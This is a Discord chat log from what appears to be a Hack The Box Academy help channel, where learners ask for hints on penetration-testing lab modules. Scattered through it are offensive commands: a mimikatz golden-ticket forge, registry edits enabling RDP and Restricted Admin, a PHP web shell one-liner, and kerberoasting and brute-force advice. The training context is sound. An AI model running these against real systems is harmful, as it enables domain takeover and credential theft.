#modules

how was everybody thankgiving. i know it's over, not even ask

I am looking for new friends to help me learn in the htb community!

if you wanna be my friend or have any questions send me a DM

@rustic sage @rustic sage read #welcome and #rules after that use /verify at #bot-commands like the others said, and take this to #general this is not the right place for that

Done and sorry

Sorry I will do it

if still stuck, feel free to DM

mimikatz x64 keeps spitting ERROR kuhl_m_sekurlsa_acquireLSA ; Key import at me and ive already changed releases twice. not sure what im doing wrong, can anyone help?

i was able to create my golden ticket via:
./mimikatz.exe privilege::debug "kerberos::golden /User:Administrator /domain:inlanefreight.local /sid:S-1-5-21-3842939050-<REDACTED-<REDACTED> /krbtgt:<REDACTED> /groups:500,501,513,512,520,518,519 /ticket:inlanefreight.local.kirbi" exit

but the error happens when I:
./mimikatz.exe "kerberos::ptt inlanefreight.local.kirbi" exit

Documentation & Reporting Module

@proud pine My direct question: Why doesnt this work?

Protip don't ping someone that wasn't even involved in the conversation, that's the easiest way for someone to not answer your question

@fathom pendant protip fight your own battles

👍

honestly he couldve answered it. it seems most of you dont want to see other succeed. It's really sad to see it happening actually. its not just me. ive seen hundreds of people get discouraged by you and a few others here. It's not funny and honestly if you're not here to teach people something then why are you here? just to troll? get a life.

It's about common netiquette

ah the "unspoken rules"

And I have helped people in the past

you help who you want and you know it. im aware its not your job, but neither is being a mod here. i se 0 mod badge...

People get discouraged by their lack of determination to work for the answer

most times all they need is a push in the right direction. a link to a source that doesnt directly give them the "answer" is always available

ive seen you brush people off before you've even understood their question

We tend to link to sources that worked for us

ive then helped those people

If it doesn't work for them, then I guess it's a slightly different issue

they seeem to understand when you dont explain to them like they're stupid

calling people stupid actively in chat is NOT common nettiquette

ive SEEN you do it

Congrats on helping people though

bye. have a good nighjt

And those people are generally ones that have a specific history of certain questions

again, half the time, you dont understand their question

i think maybe you need to look inward friend

Usually due to poor phrasing

But go off king

You're really showing me

this right here is my point exactly

that person was DONE with the lesson

their question was unrelated

YOU didnt understand

honestly i need not continue

Or ORRR they seemed to still be stuck on that issue

hahahahah nope

¯_(ツ)_/¯

you just refuse to listen. ¯_(ツ)_/¯

Btw the mimikatz error might be a version issue

I've also seen other mentions of people having little to no issues with the x32 version

You assume I wasn't still gonna look into the issue you posted about

Because we're having this little difference of opinion

And you seem quite bothered by it

I make generalized assumptions based on a displayed pattern of behavior. Because I mostly can't be asked to have all fixes that have been posted already in this channel

difference of opinion? no i just think youre not a good teacher/person in general. I'm attempting to disengage now, simply because i don't want your help. You just assume that.

Difference of opinion

:) have a good night

Like I said, I found a potential fix for your Kuhl error in mimikatz.

If it works, nice, if not well shit

I stopped helping here because of dealing with toxic people too much. I directed you here so you could get the help you needed from the people who do assist here. Your response to Marcie is exactly why I don't help here.

Also feel free to call me an idiot when I stumble through something here, I welcome it

toxic? i asked a simple question and this got blown into "dont @ people who have nothing to do with it" AS IF IT WASNT YOU WHO TOLD ME TO POST HERE

I didn't tell you I'd help you. I told you where to post your question.

its part of the cpts path

If rat was interested in helping you he'd tell you to dm

i dont know him

Okay? And the people who help with modules are active here, not in the CPTS channel.

i dont DM randoms

Marcie and rat are both some of the most prolific helpers here

but doesnt mean youre entitled to their help

Then there's the Goat of helping PayloadBunny

Truly an inspiration

PayloadBunny has the patience of a saint

Truly

right not at all, the message was to anyone who wanted to help answer the question. not berate me for asking in the wrong chat or @ ing someone

yall need to hop off the high horses

What high horse

I was specifically replying to your @ to only apply to specifically doing that thing, not your question

You need to stop crying about getting corrected

How did I berate you? I told you where to post your question, and to be more specific. The most common people who help are in this channel.

im not talking about you im talking about marcie

oh no someone told me which channel to ask my question in to get an answer boo hoo

bruh thats not even the issue

Like I'm sitting here, unbothered by your criticism

again. people here dont want to see others succeed, they'd rather just waste their time

I help people who ask good questions or provide enough context to assist them

Marcie has indirectly helped like a quarter of people pass the exam by helping them with modules lmao

And sometimes it's easier to tell someone "hey it's specifically this section/subsection"

I was in the first 20 to pass, and Marcie helped ME when I was going through the course lol

Because the course content is better than my dumbass

Before I passed marcie and rat were some of the biggest people that cheered me on and believed in me. So not wanting to see people succeed is wrong

I guide others to a treasure I cannot possess

Honestly though just focusing on my uni stuff for right now

Should have done this shit Monday

And been Ballin the rest of this week

I've also indirectly helped on modules that I have fully admitted that I haven't done or looked at

Just by being like "are you sure it's not c, b, a instead of a, b, c

¯_(ツ)_/¯

Though I will say with my full chest, they need to include a better command in the imap section of common services

People hit the Nil wall when they use the fetch command given in that module

I think it was one of my first Erratum posts

I may be missing a piece of information or a lack of understanding about how nmap works, but I am getting an error I do not understand. I keep getting the “failed to resolve” error when I attempt to scan a target

It means that it was unable to connect, what is your command

Nmap -sV -sC -p- 94.237.48.48:46167

Ah

I see your issue

Ports are defined in Nmap with -p

But also, Nmap won't get you too far with that question

You'll need to enumerate in a different way

Hmm ok thank you

Help with task 10

title Appointment

If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?

Isn't that a #starting-point box?

yes

Then ask there

This channel is for Academy modules

Also @ornate olive that's a public_ip:port if that will help you move forward. Also it helps to say what Module and Section you're working on

Ahh I see, still learning the basics so it seems that was a fundamental issue in what I thought I knew about ips which is good to know moving forward 😆 . I’m working on Getting Started, Public Exploits.

Ah that's what I assumed

If you do Nmap you do ip -p port it'll probably give you a nudge, but generally speaking (unless told otherwise) public_ip:port it's gonna be a webpage

Http

Yeah knowing the difference between private and public ips helps

But you're not gonna run into public IPs too often

so from running a scan to see what services were running on the ip i got this

PORT STATE SERVICE VERSION
46167/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Getting Started – Just another WordPress site
|_http-generator: WordPress 5.6.1

what information from this do i need to use to find an exploit, i feel like im missing a connection in my brain here

What service is running, maybe you can navigate it via a browser

wordpress?

i think im missing something here

Http

yeah its running http so how do i use that information?

...

How do you access hackthebox

I'll give it a few moments to click

i get that part, ive had it open the whole time

Yes but think, functionally, how do you get there

a url

Mhm

And a url is simply a redirect to a public ip that's registered on public domain servers

In this case, the ip isn't registered so, how do you think you'd get there - knowing it uses http on a non-standard port

Http by default uses port 80

I'd suggest doing the information security Fundamentals path after this module

i definetly think there is gaps in my knowlege

Did you figure it out?

im confused as to what you are asking

here

So it uses http and you know the ip and port the http service is hosted on

enter the ip:port into the address bar?

Yep, you may have to change browser settings, some browsers try and force https, which isn't running

But that's if putting it in the address bar doesn't work

i did that like 20 minutes ago i just didnt know thats what you were asking

I'm taking the approach that you don't know what you're doing

That webpage contains all the answers to move forward and follow the section with msfconsole

golden ticket achieved.

I did not have the problem with the ping, but my answer was not accepted

Were you able to solve it?

Hey everyone. I'm on the ACL Abuse tactics subsection of the Active Directory Enumeration and attacks module.
When setting a fake spn for the adunn user I keep getting a "constraint violation".
Been a few days and I can't figure this out. Anyone seen this before?

Constraints violation just means your request has a grammatical error or isn't following proper ldap schema

Source: I asked google

So are you sure you're formatting the command correctly

this is for htb academy not labs 😂

They were already redirected

I need help

so I am doing linux fundamentals

And?

and whenever I do uname -a

its asking me for what machine

what I paste

I dont know what to paste in

There's probably a target machine for you to ssh into, first off, second do man uname and it will tell you what info is where

ok

I did it

Or even which flag that will only give you what's asked for

man <command> brings up the 'man'ual page for a command that provides tons of info

Find out the machine hardware name and submit it as the answer.

I know

I know what the name gives

I just dont know what it is asking me

like I know it is Linux

distribution Ubuntu

it's probably asking for uname -n ?

It's actually asking uname -i

yep

I already know the linux distribution

I am just doing it to raise my rank

-n is network nodename aka what it looks like in the network

?

Academy content progress isn't reflected on main htb site

its just that "hardware name" made things unclear... if its not a, or b, then it might be d, or c

bruh why does ls not work on here

That part is actually explained in the blurb under uname in that section

I am in ssh

try l

ls -la

I am looking for dirs

What is the path to htb-student's home directory?

this is the question

Read the commands at the top of the page

If you do just cd or cd ~ you're dropped into the user's home

its cd ..

I did that got into the users home

now it asking me " What is the path to the htb-student's mail?"

I believe you can use env for that

I will see

Hi, anybody who can help me in the Windows Privilege Escalation Skills Assessment - Part II privesc? I tried to exploit the kernel vulnerability but when I tried to start the service it throw an error NVM, it worked changing the payload

Been having a problem with all modules that require me to use RDP, the FreeRDP window opens, but it's just a black screen

"Loading Dynamic Virtual Channel rdpgfx"

hit enter

...

That worked

hahaha

But why? never had this happen before

I dont know why but sometimes a blank screen appears but the desktop environment is there

if you hit some key it loads properly

Well thanks for the help! Lol

No problem 🙂

Screensaver claims another hacker

Hey Marcie I need your help

@fathom pendant have you done windows priv esc?

Nop

Taking some personal time to get some shit done

I have just finished the module

Can i DM?

sure

:))) this was the funniest solution I found in the modules channel so far! :))

You'd be surprised how often it comes up

no doubt, I was searching google for it myself before coming here to look it up, it took like 5 mins of my time today :D. I imagine myself on an actual project asking my manager I have creds but the RDP client gets stuck :))

Iirc I think it's actually that domain disclaimer that for whatever reason isn't showing

hahahah

I didnt thought that it could be the screensaver

but when it happened to me I was really confused

Hi everyone
What is the best way to do CBBH and CPTS ? Annual subscription or 2-3 months of premium subscription and unluck the materials with cubes.

2 months Plat should be enough give or take

Does it have labs with the material or how it's structured ?

All modules have a skill assessment at the end, and most sections in modules have labs that reinforce what was just taught

Same thing happened to me a few times today...

I assume lab access is unlocked with materials, but 3 months plat + exam voucher is equal to annual subscription. After 1 year you lose access to materials?

everything you unlock with cubes you keep for life

With annual, any module you complete you retain access to

All modules except tier 0 refund 1/5 their cost, and cbbh/cpts share some modules

Tier 0 is 10 back

the police cant help with that
Roblox support will help

My brother in christ that was a week ago

I know it was a week ago ?

Then the point is moot about correcting him now lol

Also there was a suggestion to contact roblox support after it was clarified

Ok

Reading is hard for hackers, it's a real problem

Wdym

Is that aimed at me also I'm not even a hacker not that im wanting to learn it

Literally not even a handful of messages down from the one you replied to was the suggestion (by the same person) to contact roblox support

You don't want to learn? Yet you're in a server all about it? Or am I misreading what you're saying

I was going to learn it but I'm not wasting my time learning when I could do other things

Cool, then bye

This isn't a gen chat either

Where is the gen chat

You need to link your main htb account to discord to access it

#welcome <- instructions conveniently here

I don't have htb

It's free to sign up

¯_(ツ)_/¯

I'm wanting a loud ecoboost

And I don't care lol

This channel is for discussion and assistance with the htb academy modules

K

I told you that back then 🤷🏻‍♂️

Is that the same person?

Yes

Just completed the module NTLM RELAY ATTACKS and it's awesome!

All the contents were well crafted and explained. The final assessment will really test how well you absorbed the contents. It's great!

Congratulations guys for your dedication!

Different username that was trying to 'correct' you

Nice

Congrats 🎉

0.00% gang

Can someone help me with the module using crackmapexec? I'm stuck in the Skill Assessment section on the first question, I found the username list with --rid-brute from dc01 but I can't find any common password. Should I use some wordlists?

Yeah probably

Start small and if all else fails break out rockyou

Both options seems good.. Annual or plat for cube unlocks

Hi, I am having trouble spawning the machine for my tutorial

can someone pls help?

Ask the support team (green bubble)

Footprinting - Hard as part of CPTS Training

Questions:
||Completed this module, but I have some doubts after looking at some responses here.

1. How would I know if my private ID_RSA key can be used for the root user? I would have thought that the key belongs to Tom only, and hence I would have thought I could only SSH with the private key with Tom only. Turns out it works for the 'root' user too?

2. I had a lot of problem with regards to the last part. I know there is a MySQL service, but I couldn't Nmap any open MySQL ports. I even tried to start the service within SSH, but obviously that won't work. Why does running mysql in SSH works though? Can anyone give me a ELI5? Not sure why that is possible.||

Thank you!

hello guys

<div class="field">
<label for="passwordInput" class="label">Senha</label>
<div class="control has-icons-left">
<input type="password" name="password" id="passwordInput" class="input" required placeholder="********">
<span class="icon is-small is-left">
<i class="fa fa-lock"></i>
</span>
</div>
</div>
<div class="field">
<label for="rememberBox" class="checkbox">
<input type="checkbox" name="remember" id="rememberBox"> Lembrar
</label>
</div>

        <div class="field has-text-centered">
            <div class="columns">
                <div class="column is-half">
                    <button class="button is-info is-fullwidth" id="loginButton">Entrar</button>
                </div>
                <div class="column is-half">
                    <button class="button is-fullwidth" disabled>Cadastro</button>
                </div>
            </div>
        </div>
    </form>

how can a change the <button class="button is-fullwidth" disabled>Cadastro</button> to allow create a new user?

#welcome

Anyone else here a beginner?

I’m a beginner and want to get started into hacking any tips

do the intro to infosec academy path then go starting point then do boxes

and try not to overcomplicate it for yourself the more you just do stuff and try not to worry about how good or bad you are and what you should do next the better

For part 1. That's considered a spoiler but basically, just try.
Part 2) the service is running internally, meaning it doesn't have access to the outside, it's like trying to look at a hidden room in a house - the only way to know it's there is by being in it

Stuck at AD Enumeration & Attacks - Skills Assessment Part I

Question:
Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

I really can't find a clue to proceed further. Only accessed the webshell.
I don't know from where to get the username and password to rdp to the machine..!

Can anyone help to get started with????

You didnt tell me anything back "then"

I just started footprinting too but didn´t read spoiler since its been like only 15 min and didnt come across any box xD

In the "file upload course", in the "blacklist filters" module. I manage to successfully upload a file with a php extension, but i get this error:

Is this apart of the challenge in the module? Also I have tried every extension from this list: https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/attack/file-upload/alt-extensions-php.txt

Hello everyone! I am working on the AD enum and attack and I'm at the skills assessment 2. I'm running into issues finding the Admin hash. I've come across two from running mimikatz, dumping the sam and lsass but haven't found anything that'll get me onto MS01 as admin. Also if anyone would want to chat about how they identified the SeImpersonate issue I'd love to hear it, I found it by just trying everyting.

The bruteforce module is kinda slow...
[STATUS] 76.16 tries/min, 2361 tries in 00:31h, 604791 to do in 132:21h, 4 active

Any way to speed this up?

I think you can go up to 64. Try -t 64

I dont think the problem is in the extension list , I think you should find a way to encode you php

i think <? is in the blacklist filter

you can find seimpersonate by just running whoami /all

Thanks I'll try that in the skill assesment 🙂

Regarding the use of an ID_RSA private key for the root user, it’s possible that the private key you have is indeed authorized for the root user as well, SSH keys are configured in the ~/.ssh/authorized_keys file of the user that you’re logging into. If Tom’s private key is listed in the root user’s authorized_keys file, then it will allow access. This can happen if Tom has been given root privileges, It’s all a part of trial and error, you’ll never know if you don’t try it..

It’s possible for MySQL to run and only listen on the localhost interface (127.0.0.1), which means you wouldn’t detect it with an Nmap scan from a remote machine. when you’re already connected to the machine via SSH, running the mysql command would work because it attempts to connect to MySQL over the localhost interface, which is where the service is listening

What service are you trying to brute force?

ssh

Hey y'all.
Is anyone else having trouble connecting to boxes they spawn up via ssh? It just consistently times out for me

Try ftp instead 😉

will do 😄

Not with -t 64 threads either, I’d try with something like 48

ok, i'm just running Nmap real quick to see if a FTP port is open.

Haven’t done that part yet but does sekurlsa::logonPasswords /full in Mimikatz help?

Thanks for the reply! I just tried it and it didn't output the domain admin, just the mssqlsvc clear text. I'm running mimikatz on SQL01 under SYSTEM, and I think I'm doing something wrong because it seems like that is working for most and I'm stumped.

The only way I've been able to see the domain admin account is by pulling the sam, system, and security hive and running pypykatz, but that's just the mscached version and won't work.

Ope... I see that now. I appreciate that!

Hey @hardy meadow
Can you help me with AD Enumeration and Attacks Skills Part 1?

Sure thing, what do you need help with?

Hi everyone! Can someone who has worked on "Analyzing Evil With Sysmon & Event Logs" module help me? So, on Detection Example 1, I'm having difficulties trying to hijack Windows Calculator using reflective DLL. I placed both files to a writable directory (under Desktop), but I did not get the "hellow from DllMain!" message. Instead, the Calculator started running. Am I supposed to use a tool to gain access to any of the file's config script to execute it?

Hey, What is this server for?

Greetings good people of HTB, I got a small question.
I am on module Shells and Payloads -> Laudanum section
I answered the first question.

Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)

Kinda stuck at this one. The operating system is windows, I am using kali to do the whole task.
I don't understant the question. Is there a specific aspx web shell that I have to search on my kali to be able to answer the question, or do I have to dig deeper into the stuff?

Lol, I'm on the sql injection and accidentally found a flag meant for later in the course

ez

Basically we discuss anything related to Hack The Box.

Be it, modules, certificates, or generally anything in the vast field of cyber security.

Everything here's ethical and done via lab environment.

Nvm, did it.

Currently I cannot proceed further to RDP to the machine? Having no idea how to proceed

Can you help me in this?

Stuck at AD Enumeration & Attacks - Skills Assessment Part I

Question:
Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer

I really can't find a clue to proceed further. Only accessed the webshell.
I don't know from where to get the username and password to rdp to the machine..!

Can anyone help to get started with????

One sec and I'll check my notes

Sure

You were able to get the flag for the Admin right? Did you already set up a reverse shell to your attack host?

Yes found the flag present in the desktop of the administration

For reverse shell NO

I thought I have to do something with the given web shell 😅

Should I use revshell for this or something else?

Went through forums, many recommended lot of ways, all messed up

you should list what access your currently have

Only the webshell
😣

and what is the user for that webshell?

WEB-WIN01

Hello, I am following the XSS module

And I am in Phishing section

And when I put sudo php -S … in bash it doesn’t work

nope, the user you have running the webshell, not the hostname

When I login I don’t receive the password in bash

And when I want to see creds.txt they said me that It doesn’t exists

Help me pls

nt authority\system

yep, that's as good as a domain account, so kerberoast away

Should I start with this shell or setup seperate revershell and then go further?

Also this webshell have lot of restricions

you have system, you can do whatever you want on that

ok let me try
Thanks for the help

anyone might have an idea why RDP is not working in Pwn3d Enum & Attack AD Lab II?

You dont have a GUI enabled

you cant use rdp headless

on the contrary, enable it beforehand

I ran this two commands beforehand :

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

in a pivot machine

Hi, PW attacks module

Hi all,
Has anyone completed the last task of the "INTRODUCTION TO WEB APPLICATIONS" module - Next Step? Where you have to create your own simple web app (static web page + API + back end) and then test it for vulnerabilities and fix it!
I created a web app, but when trying to test/hack it, nothing (the methods posted during the module) works.
Could someone tell me why? Or tell me what testing methods are applicable for my web app?
Here is the link for my web app - https://github.com/Utmins/WebApp_PHP.git

Hello, I'm doing the dns lab for the common web services

I wasn't unable to find the dns flag through DNS requests

I found another way but I want to check

What exactly didn't work?

Just finished AD enumeration and attacks and I loved it, I did actually learn a lot from this one, so much juice in here that I think that I'll stick to the subject for a while.

@acoustic owl I used dig to get the flag but I don't get any anwser for the flag record ( I don't want to spoil here)

I didn't work either with the automated tools

🧃

You need to provide some information so that I can help you.
Was there an error message?
Which domain did you query?

Thanks! Yeah I didn't know why it was saying grammatical error when I was following the module commands step by step. After digging through the channel history it seems like I might need a backslash for the spn name instead. I'll do it later today and tell you what happens.

Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. (Format: **, 1 space)
Shells/Payloads module.

Guys I am damn slow.
(Format: **, 1 space)

I found the answer
||iis apppool\defaultapppool||
But I have no idea how to fix it..
What is the answer supposed to be?

Try just the left half

Will do , 1 sec.

Nope.

I thought of removing the same letters, so it comes down to ||is\apol||

https://academy.hackthebox.com/achievement/1009496/233

What section?

Antak Webshell.

That's stupid

Well, I am stupid.

And you did the webshell on the vhost yeah?

Yup.

Want screenshots in DMs?

Just show a screenshot of the address bar here

Address bar?

Url

The thing you're putting your webshell in

Yeah, just waiting for my gyazo to load.

Don't need gyazo

@acoustic owl can i pm you?

That's weird having IP/domain but whatever it works

||result ||

I doubt it's credential related.

Unless it has SPECIFICALLY to be <htb-student> user and pass.

Did you add status.inlanefreight.local to your /etc/hosts

Uh..no?

Then it's likely you're not on the actual correct upload page

So it's causing issues

How do I add it to /etc/hosts

...

It was a joke.

No worries, let me re-do it.

Please don't give me an aneurysm

Like that?

it goes ip then hostname

if you see the pattern with 127.0.0.1 \t localhost can repeat it

Well, that's new. Lemme do that

ip is probably not 127.0.0.1

Oop, yeyeyeye

unless you are doing a port forward or something

which maybe you are I didnt look far enough up in the chat

Can I do 127.0.1.2

Nuh, shells and payloads.

the IP should be the box you spawned likely

the 10.129.x.x one

So I have to change it every time I spawn a new box?

In the /etc/hosts?

ya

Yessirr.

Alright, lemme re-do it.

Thx g.

sure thing

sure

Well, I changed it to the targetIP, uploaded the .aspx (antak webshell)

But it gave the same answer as before.

can you screenshot ._.

Yessir.

What would you like to see.

what the issue you are having is

So this is the result:

Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. "(Format: **, 1 space) "
Shells/Payloads module.

Guys I am damn slow.
(Format: , 1 space)

I found the answer
||iis apppool\defaultapppool ||
But I have no idea how to fix it..
What is the answer supposed to be?

That's the task.

I will delete it afterwards as it contains the answer.

what's there to fix? you got the answer, no?

It doesn't work.

And whenever I post the format here in dizzy, these little * fix themselves.

what does't work

||iis apppool\defaultapppool||

That's the result from whoami.

yea? that's the answer

Well, when input it doesn't work.

did you format it according to the question?

I tried a lot of stuff. I just don't get how to format it.

ah I see now, once you added to /etc/hosts the url replaces the ip

and this question is in the antak webshell section?

I didn't have it in /etc/hosts before, same result regardless.

Yup.

I dont think apppool is the right answer to that ._.

or at least its not what I have

I hope.

i need 200 person

So I gotta dig deeper?

Are you still trying to do ip/status.inlanefreight.local?

Did it already.

It could be that they have a different account run different instances idk

I just have a different answer in my notes for that

Wait.

Instead of just status.inlanefreight.local

Yeah?

that etc hosts is right

are you sure you are looking at the right host

like that ip is what spawned when you started the assignment

I did use another credential htb-student and HTB_@cademy_stdnt! when setting up UPload.aspx.

Yep.

That vhost is given on the section

I extended the time.

Webshell doesn't care about who uploaded it

once you added the vhost, go to that vhost and upload the shell, it's simple as that

^

???

It gave a diff answer.

Yes

Yes

Delete that as its a spoiler

It worked :D

Thank You guysss <3

At least you learned what vhosts are now

I just don't get how there's difference between <ip> status--and just the status--

Because they aren't the same

At all

Because that's not how vhosts work

I know what I will be reading this night.

Want me to delete the wrong answer , that's a bit above in the convo?

Ip redirects to the default web location, however when you add it to /etc/hosts with the right subdomain/vhost it tells the web service to direct you to that set of files

I see now.

i'm on footpriting module, just finished the cloud section , and im really amazed by how a single mistake can lead to a company falldown

Well...yeah.

the amazon ssh keys leaks are crazy

That's generally how most companies get hit

The medium lab will be fun, I assure you,

dammn

One dumb user/one misconfig

The hard lab would seem easier than the medium.

Humans aren't bright

hehehee im really excited about this module , can't wait to start the labs !

That's why they r humans.

lol

If you need assistance DM me.

I got it all documented.

Won't spoonfeed.

But I would give you advice.

That's what I enjoyed most, the medium lab.

Like...of all HTB as of now.

alright man ! i will definitely hit you up if i need some assistance about the labs !

yeaaaaah man

HTB Academy is so well structured

It iss.

and i also love how they teach stuff with tons of examples

Mhm.

It's detailed as hell and I love it.

makes studying fun lmao

My parents r yelling at me for not sleeping while doing HTB X_X.

Then sleep, nerd

I would take that any day for 12 hours rather than regular university.

Nuh uh, I want CPTS.

And it'll still be waiting for you

i'm also a student and i only do HTB and some alternatives, the uni courses are shit

Lol, someone tried to invite.

I study info systems and programming.

my spouse calling me freaking psycho with all the cyber staff

im on my first year uni , we aren't even studying shit about cybersecurity lol

Idk, now that I have shown people what I can do, people attempt to hire me for stupid stuff.

https://youtu.be/zvSSujU5R3s?si=_GrjTilhLLlfbZNH

And I can't do a lot.

got any certs under your belt?

For some reason the rConfig has default admin:admin credentials.

Nope, CPTS will be the first,

It happens

i wish you the best friend ! i hope you get your sword soon !

Will do, kind people.

Thanks man!

Also getting rest is important

It helps your brain retain information

I am excited for the 10 days of fun.

I hope it doesn't melt in the meantime.

agree

If you go into it exhausted to all hell or don't pace yourself you will fail

True.

Just being blunt

I got an exam tomorrow, I am actually going to sleep. Leaving the php web shells and live engagement for tomorrow.

Tired = mistakes, mistakes = frustration, frustration = stagnation, stagnation = failure

Someone pin that for the CPTS.

"Tired = mistakes, mistakes = frustration, frustration = stagnation, stagnation = failure "- Marcie 2023

Anyways, gn lads. It was fun talking.

I will be back soon.

I always step away when I start getting frustrated or start making too many mistakes

also ,don't forget to stay hydrated lol

🌵

yeah even the pjpt is an easy exam, when i was stuck in it , taking some steps away and getting a good nap helped my brain to open up

UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK- Introduction To Splunk & SPL (first module), 3rd question:

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

How is the answer the actual answer? I used bucket... looking at the hint, I have no clue how they expect us to use range(). What I'm saying is, my search yielde din diffeent accounts with a higher count within a 10m span than the answer account

Is this the right channel to ask? or should I go to cdsa?

Could I bother you for a hint about how you processed with question 8 on the second skills assessment? I've been stumped for a couple of days now. I can't see to find the right admin hash. Thanks!

range() is max() - min()
This gives you a difference. You can then use this to filter the 10 minutes

Modules is the correct channel

in the module page, it only mentions earliest and latest

PM

how would range be used in splunk? are the parenthesis included?

https://docs.splunk.com/Documentation/SCS/current/SearchReference/Aggregatefunctions#range.28.26lt.3Bvalue.26gt.3B.29

PM Sent

am I being silly to think that there is an instance with 250 SYSTEM logons in a span of 10 minutes?

Thanks for the resource 🙂

I don't know how you searched for them, but I get a different result

👀

should I send screenshots on here or PM? idk what's the common courtesy

PM me

hey there, i'm just finished this module

Using Splunk Applications : Access the Sysmon App for Splunk and go to the "Reports" tab. Fix the search associated with the "Net - net view" report and provide the complete executed command as your answer. Answer format: net view /Domain:_.local.

What Sysmon App? I don't see it

Has anyone taken the Secure Coding 101: Javascript module? I'm interested in going deeper into JS security for my web security studies.

Anyone do the Skills Assessment (1 or 2) on Intro to Whitebox Pentesting? Stuck on both. On SA1, have authentication, but cannot for the life of me figure out how to get code execution... (seems simple enough, but again, just not getting it). On SA2, went thru the sanitization/validation, and now it says "code injection should not be possible, even without sanitization or validation".... but at a loss on to do (excl the sanitization/validation). Please feel free to DM. Thx.

EDIT: Still lost on part-1, but broke-down and used a code analyzer on part-2 and while not (yet) solved, identified a clear problem.

Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it?

not work

Hi I just finished the Command Injection Skill Assesment Module. However I notice commands like base64 -d <<<sinebase64str and ${PATH:0:1} doesn't work on that server even on a php shell <?php system($_GET["cmd"]); ?> am I mssing something. Is it related how the server is configured? is it possible to disable things like ${PATH:0:1} and <<< from a linux level?

I see. Guess I need to have the mindset of 'trial and error' haha

Gotcha! Didn't know that was possible, much thanks for the help!

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.inlanefreight.com/

Hey dude, saw you did Secure Coding 101: JS a while back, any feedback on the module? How heavy are the requirements, was it any good?

Considering I had effectively 0 JS experience but was able to fumble my way thru it... I think it provided everything needed to succeed. Gotta pay, really, Really, REALLY close attention to what you're doing -- very easy to mess up and be at a loss as to why. Very satisfying to complete. And with that, I'll re-review that module in looking for what I'm missing on the second part of the intro to whitebox SA, thx.

Cheers!

that's not how you ffuf a subdomain

that's definitely wrong homie.

according to the guide it is that way

defxsec@htb[/htb]$ ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.inlanefreight.com/

Cheat Sheet >> ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/ Sub-domain Fuzzing

what finds me is the following

www support my blog

it says this on HTB's cheat sheet?

oh they changed the question from when I did it

this would work but the syntax is wrong, use the same case for FUZZ

yes

hi guys i did intro to threat hunting with elastic's skill assesment.I have a question regarding task 3 which requires to Create a KQL query to hunt for "PowerShell Remoting for Lateral Movement". Enter the content of the winlog.user.name field in the document that is related to PowerShell remoting-based lateral movement towards DC1.) I was able to find the answer using hints given . However I am curious how I can validate 100% the command I have found was targeting DC1 since when I filter for destination.address I get 0 results

Still stuck on ACTIVE DIRECTORY ENUMERATION & ATTACKS: AD Enumeration & Attacks - Skills Assessment Part I

I am trying to transfer mimikatz.exe from pwnbox to that webshell given as default in the section
After running the command the above command why there is no mimikatz.exe in the directory I am transferring?

Stuck for more then a day..!!! Seriously
Please help

does the target even have scp installed? and doesn't antak have a file upload function? why take the extra steps

and are you still trying to kerberoast

I am not able to find the upload button

let me show you

Is there a glitch or something
After this when i check /uploads no mimikatz.exe

wat

I'm talking about the antak webshell, not the upload page

Can you mention this here?
I am not getting this exactly

Hey guys I didn't really know where to go for this question but I'm having this issue where my VM isn't naturally routing to HackTheBox using OpenVPN. Default route is still the public ip and I have to specify the interface the vpn uses in order to get commands like ping to work....

aah sorry
my bad

got this

sorry @next bronze for making a mess up

got it?

and what's the point of using mimikatz there?

Hello, there. I have not seen that happen before. Are you using Window's as your host OS? Also, a foolish question, but are you using sudo when you run openvpn? I know that my personal firewall and VPN did cause a few issues.

Hello, folks. I hope that this is the right place to ask this. I have been working on the Intro to Assembly, and I have been stuck on Conditional Branching for hours. I am not even sure what it is asking. I have tried everything that I could think of and read on the page. I am just stuck, and I was hoping someone could please point me in the right direction so that I can get the correct HEX.

I'm using Kali Linux as the host. I am also using sudo when running openvpn. The site detects that I am connected and it is technically confirmed that I am connected when I execute a command like ping -c 5 -I tun1 [Ipaddress]. Pinging the target machine with the VPNs interface. That will work but it isn't viable once I get to commands like telnet as there is no way to specify the interface in that command, leading to a deadend with the lab...

change the assembly code so that rax is 10 when it reaches the instruction cmp rax, 10

cmp rax, 10
jnz loop

first line compares rax to 10, if rax is 10, the zero flag will be set, the second line will jump if the zero flag is not set

Anyone ever done this module to be able to say if I'm supposed to find the sysmon app or get it running myself?

Oh, I am not sure then. I am sorry. I assume you are running two different terminals or tabs? I wish I could help, but I have not seen that.

the interface will be selected automatically when you specify an IP for telnet, it will route to the VPN IP range, 10.x.x.x

Thank you. I did try that, but it still says that the answer is wrong.

did you put in the hex value?

Yes, the hex of the two numbers multiplied. I did not just want to say it. I did only put in the four characters

the answer should be the value of mov rax, 5 after modifying to break the loop, not the final value

I do not think tht we have to get anything running in there. We just look for the items it wants us to look for. At least from what I recall, as I finished that up a few weeks ago.

that's fair, do you know where I would go to ask if everything is as it should be with the module? I don't see the sysmon app installed

Thanks for answering 🙂

